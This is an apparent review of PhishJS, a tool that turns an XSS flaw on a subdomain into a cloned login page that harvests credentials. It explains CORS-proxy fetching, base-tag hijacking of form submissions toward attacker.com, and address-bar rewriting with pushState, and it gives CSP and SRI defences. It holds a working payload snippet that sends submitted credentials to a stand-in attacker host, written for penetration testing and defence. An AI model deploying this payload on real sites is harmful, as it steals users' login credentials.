PhishJS: When XSS on test.example.com Becomes a Credential Harvesting Nightmare


Hook

That forgotten XSS vulnerability on your staging subdomain? It's not just a low-severity ticket anymore—with 200 lines of JavaScript, an attacker can transform it into a pixel-perfect clone of your production login page that steals credentials while displaying your legitimate domain in the address bar.

Context

Security teams have long treated XSS vulnerabilities with a risk-based approach: reflected XSS on api.example.com gets a Medium rating, while the same vulnerability on mail.example.com might warrant Critical. The reasoning seems sound—why panic about script injection on a development subdomain when there's nothing sensitive to steal? PhishJS exists to demolish this mental model.

The tool addresses a gap in traditional phishing infrastructure. Classic phishing requires registering look-alike domains (examp1e.com), hosting infrastructure, and hoping users don't notice the subtle differences. Even sophisticated techniques like homograph attacks (using Cyrillic characters) are often caught by modern browsers, which display suspicious internationalized domain names in Punycode. PhishJS takes a different approach: instead of impersonating the target domain, it operates from within the target's own domain space, exploiting the implicit trust users place in seeing 'example.com' in their browser. By weaponizing low-impact XSS, it converts what might be dismissed as a P3 finding into a practical credential theft mechanism that sidesteps the usual phishing-awareness advice to check the address bar.

Technical Insight

[Figure: system architecture (auto-generated). In the victim's browser, the XSS payload executes and fetches the legitimate login page through an external CORS proxy. The returned HTML is parsed into a DOM, a base tag is injected so the form points to the attacker, CSS/JS resource paths are patched, the page content is replaced via document.write, and the browser URL is changed to display /login. When the user submits the form, the credentials are POSTed to the attacker's server.]

PhishJS implements a surprisingly elegant attack chain that manipulates DOM APIs and browser behavior to create convincing phishing pages. The core technique revolves around dynamically cloning a legitimate login page while redirecting form submissions to attacker infrastructure—all from the context of an XSS payload.

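The attack begins by fetching the target login page through a CORS proxy. The proxy is needed when the login page lives on a different origin than the vulnerable page (for example, example.com versus test.example.com): the browser will send a cross-origin fetch(), but the same-origin policy prevents the script from reading the response unless the server opts in with CORS headers. The proxy re-serves the page with permissive headers. Here's the fundamental approach: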

fetch('https://cors-anywhere.herokuapp.com/https://example.com/login')
  .then(response => response.text())
  .then(html => {
    // Parse the HTML
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    
    // Inject base tag to hijack form submissions
    const base = doc.createElement('base');
    base.href = 'https://attacker.com/';
    doc.head.insertBefore(base, doc.head.firstChild);
    
    // Fix resource paths to load from legitimate domain
    doc.querySelectorAll('link[href], script[src], img[src]').forEach(el => {
      const attr = el.href ? 'href' : 'src';
      const url = el[attr];
      if (url && url.startsWith('/')) {
        el[attr] = 'https://example.com' + url;
      }
    });
    
    // Replace current page
    document.open();
    document.write(doc.documentElement.outerHTML);
    document.close();
  });

The <base> tag injection is particularly clever. This HTML element sets the base URL for all relative URLs in a document. When the cloned login form has <form action="/api/authenticate">, the browser resolves it relative to the base tag, sending credentials to https://attacker.com/api/authenticate instead of the legitimate endpoint. From the user's perspective, everything looks normal—the page styling is intact, the URL shows the trusted domain, and the form behaves as expected.
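The resolution rule itself can be checked outside a browser. The sketch below is an illustration only: it uses the standard WHATWG URL constructor, which applies the same relative-URL resolution a browser uses for a form's action attribute. The helper name resolveAction and the 'session/new' path are hypothetical; the hosts are the placeholders already used in this article.

```javascript
// Illustration only: resolve a form action against a document base URL,
// the way a browser does once a <base href> is in effect.
function resolveAction(action, baseHref) {
  return new URL(action, baseHref).href;
}

const injectedBase = 'https://attacker.com/'; // placeholder host from the snippet above

// Root-relative and path-relative actions follow the base URL.
console.log(resolveAction('/api/authenticate', injectedBase));
// → https://attacker.com/api/authenticate
console.log(resolveAction('session/new', injectedBase));
// → https://attacker.com/session/new

// An absolute action ignores the base URL entirely.
console.log(resolveAction('https://example.com/api/authenticate', injectedBase));
// → https://example.com/api/authenticate
```

Absolute action URLs are unaffected by a base tag, but that is not a mitigation on its own, since injected script controls the whole DOM. The reliable controls are the CSP directives discussed later in this section.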

The resource patching phase is critical for maintaining visual fidelity. Without it, CSS and JavaScript files would attempt to load from the attacker's domain and fail. PhishJS walks the DOM tree, identifies resource references, and rewrites relative paths to absolute URLs pointing to the legitimate domain. This means stylesheets, fonts, and even JavaScript libraries load correctly, maintaining the authentic appearance of the login page.

URL manipulation adds another layer of deception. Using history.pushState(), the script can modify the browser's address bar to display '/login' or any path that enhances credibility:

window.history.pushState({}, '', '/login');

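This doesn't trigger a page reload but updates what the user sees in the location bar. pushState() can only change the path, query, and fragment within the current origin, so the host shown is always the one where the XSS fired. Combined with execution from a legitimate subdomain, the result is deeply convincing: the URL shows 'subdomain.example.com/login' while the page displays a perfect replica of the real login form.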
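To make the limits of this step concrete, here is a small sketch of the constraint browsers place on history.pushState(): a URL on a different origin is rejected with a SecurityError. The helper name isAllowedByPushState is hypothetical, and comparing origins is an approximation of the browser's actual check.

```javascript
// Hypothetical helper: approximates the same-origin check that
// history.pushState() enforces on its URL argument.
function isAllowedByPushState(currentHref, targetUrl) {
  const current = new URL(currentHref);
  const target = new URL(targetUrl, current); // relative URLs resolve against the current page
  return target.origin === current.origin;
}

// Changing only the path on the vulnerable subdomain is permitted.
console.log(isAllowedByPushState('https://test.example.com/search?q=x', '/login')); // → true

// Claiming the production host is not; a browser would throw a SecurityError.
console.log(isAllowedByPushState('https://test.example.com/search?q=x', 'https://example.com/login')); // → false
```

This is why the address bar is a useful signal for defenders and trained users: the subdomain in the URL cannot be disguised by this technique, only the path after it.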

The attack surface this creates is broader than it initially appears. Consider multi-tenant SaaS applications where customers get subdomains (customer1.saas-product.com). A stored XSS on one customer's subdomain could be weaponized to phish users from other customers by cloning the main login page. The victim sees 'customer1.saas-product.com/login' and may not question why they're logging in through a customer subdomain rather than the main domain.

From a defensive perspective, Content Security Policy can break this attack at several points, provided the policy is served on the page where the XSS fires. A base-uri 'self' directive stops the injected base tag from pointing off-origin, a form-action directive blocks form submissions to external domains, and a restrictive connect-src blocks the initial fetch to a third-party proxy. A strict script-src can stop the injected script from running at all. PhishJS demonstrates what happens in the common scenario where CSP is absent or poorly configured, a situation that remained prevalent as of 2024.
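As a minimal sketch of such a policy, the helper below assembles a header value with the relevant directives. The directive names are standard CSP; the function name buildLoginCsp and its formTargets option are hypothetical, and a real policy would need tuning to the application's actual resource origins.

```javascript
// Minimal sketch, not a drop-in policy: assemble a Content-Security-Policy
// value covering the gaps this technique relies on.
function buildLoginCsp({ formTargets = ["'self'"] } = {}) {
  const directives = {
    'default-src': ["'self'"],   // also disallows inline scripts, which blocks many XSS payloads
    'base-uri': ["'self'"],      // a <base href> pointing off-origin is ignored
    'form-action': formTargets,  // form submissions to other origins are blocked
    'connect-src': ["'self'"],   // fetch()/XHR to third-party hosts are blocked
  };
  return Object.entries(directives)
    .map(([name, values]) => `${name} ${values.join(' ')}`)
    .join('; ');
}

console.log(buildLoginCsp());
// → default-src 'self'; base-uri 'self'; form-action 'self'; connect-src 'self'

// In a Node http handler this would be applied as:
//   res.setHeader('Content-Security-Policy', buildLoginCsp());
```

The policy has to be sent on every subdomain, including staging and development hosts, because it is the vulnerable page's policy that governs the rewritten document.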

Gotcha

PhishJS has hard dependencies that limit its practical applicability. The most obvious is requiring an existing XSS vulnerability: this isn't a tool for finding XSS, it's for weaponizing known vulnerabilities. That might seem trivial, but modern frameworks (React, Vue, Angular) escape rendered output by default, which makes XSS increasingly rare, although escape hatches such as dangerouslySetInnerHTML or v-html can still reintroduce it. You're more likely to find exploitable XSS on legacy applications or custom-built admin panels.

The CORS proxy dependency is both a technical and an operational weakness. Public CORS proxies have rate limits and availability issues; the cors-anywhere.herokuapp.com demo instance, for example, has been limited to temporary, opt-in access. Running your own proxy requires infrastructure and leaves detectable patterns: blue teams can monitor for traffic to known CORS proxy domains. Subresource Integrity (SRI) is a further complication. Because the patched URLs point at the unmodified files on the legitimate domain, the hashes themselves still match. The problem is that those files are now loaded cross-origin, and browsers only validate integrity on cross-origin resources that are fetched with CORS and served with the appropriate headers. A script or stylesheet that carried an integrity attribute as a same-origin resource is therefore likely to be blocked on the cloned page, which then renders visibly broken and may alert the user.
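For readers unfamiliar with SRI, the sketch below shows how an integrity value is derived, using Node's built-in crypto module. The helper name sriHash, the sample file content, and the /app.js path are hypothetical.

```javascript
const nodeCrypto = require('node:crypto');

// Compute an SRI integrity value: the algorithm name, a dash, and the
// base64-encoded digest of the exact bytes the browser will receive.
function sriHash(content, algorithm = 'sha384') {
  const digest = nodeCrypto.createHash(algorithm).update(content).digest('base64');
  return `${algorithm}-${digest}`;
}

const integrity = sriHash('console.log("hello");'); // sample content, not a real asset

// The crossorigin attribute makes the browser fetch with CORS, which is
// required for integrity checks on resources from another origin.
console.log(`<script src="/app.js" integrity="${integrity}" crossorigin="anonymous"></script>`);
```

Since the digest covers the file's bytes rather than its URL, an unchanged file keeps the same hash wherever it is loaded from. What differs on a cloned page is the origin relationship, which is why the CORS requirement is the part that bites.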

The 'hacky' nature of base tag injection, as the author acknowledges, means reliability varies wildly. Single-page applications that handle routing client-side might not use form submissions at all—they'll capture input events and make fetch() calls, completely bypassing the base tag hijack. Applications with JavaScript-based form validation might reject submissions that don't match expected patterns. And any application with a properly configured Content Security Policy essentially nullifies the entire approach. This makes PhishJS highly situational: effective against traditional server-rendered applications without CSP, nearly useless against modern SPAs with security headers.
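One way to check whether a given policy actually closes these gaps is to audit its directive list. The sketch below is a deliberately simple parser, not a full CSP implementation; the function name missingPhishingDefenses is hypothetical. It relies on one fact from the CSP specification: base-uri and form-action do not fall back to default-src, so each has to be declared explicitly.

```javascript
// Hypothetical audit helper: report which of the two directives relevant
// to this technique are absent from a policy string.
function missingPhishingDefenses(policy) {
  const present = new Set(
    policy
      .split(';')
      .map(part => part.trim().split(/\s+/)[0].toLowerCase())
      .filter(Boolean) // drop empty segments, e.g. after a trailing semicolon
  );
  // Neither directive inherits from default-src, so both must appear by name.
  return ['base-uri', 'form-action'].filter(name => !present.has(name));
}

console.log(missingPhishingDefenses("default-src 'self'"));
// → [ 'base-uri', 'form-action' ]

console.log(missingPhishingDefenses("default-src 'self'; base-uri 'none'; form-action 'self'"));
// → []
```

A policy consisting only of default-src 'self' looks strict but leaves both directives unset, which is a common form of the "poorly configured" case described above.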

Verdict

Use PhishJS if you're conducting authorized penetration tests and need to demonstrate the real-world impact of XSS findings that stakeholders are dismissing as low-severity. It excels at proving that 'just XSS on a dev subdomain' can escalate to credential theft, making it valuable for security advisory reports and executive briefings. The tool is particularly effective in red team engagements where you've achieved initial access through XSS and need to pivot to credential harvesting without deploying obvious phishing infrastructure.

Skip if you're looking for automated XSS discovery, need persistent credential harvesting capabilities, or are targeting modern single-page applications with Content Security Policy. Also skip if you need production-grade reliability: this is a proof-of-concept tool that works best for demonstration purposes in controlled environments. For sophisticated phishing campaigns requiring 2FA bypass, look at Evilginx2 instead. For broader post-exploitation capabilities beyond credential theft, BeEF offers a more comprehensive framework.
